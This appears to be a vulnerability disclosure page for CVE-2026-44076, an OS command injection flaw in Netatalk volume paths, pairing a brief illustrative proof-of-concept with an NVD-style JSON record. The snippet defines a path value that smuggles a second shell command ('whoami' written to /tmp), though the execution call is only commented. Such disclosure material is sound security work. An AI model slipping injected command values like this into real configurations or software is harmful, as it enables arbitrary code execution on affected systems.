CVE-2026-44076

# PoC for CVE-2026-44076 # Requires local high privileges to modify configuration malicious_path = "/valid/path; whoami > /tmp/pwn.txt" # Simulating vulnerable configuration write print(f"[+] Injecting malicious path: {malicious_path}") # Hypothetical vulnerable function execution # system(malicious_path) would execute both commands print("[!] If exploited, 'whoami' output is written to /tmp/pwn.txt")

{"cve": {"id": "CVE-2026-44076", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-21T08:16:23.023", "lastModified": "2026-05-21T15:20:19.040", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient sanitization of volume paths in Netatalk 3.1.0 through 4.4.2 allows a local privileged user to inject OS commands and execute arbitrary code via a crafted volume path."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://netatalk.io/security/CVE-2026-44076", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c"}]}}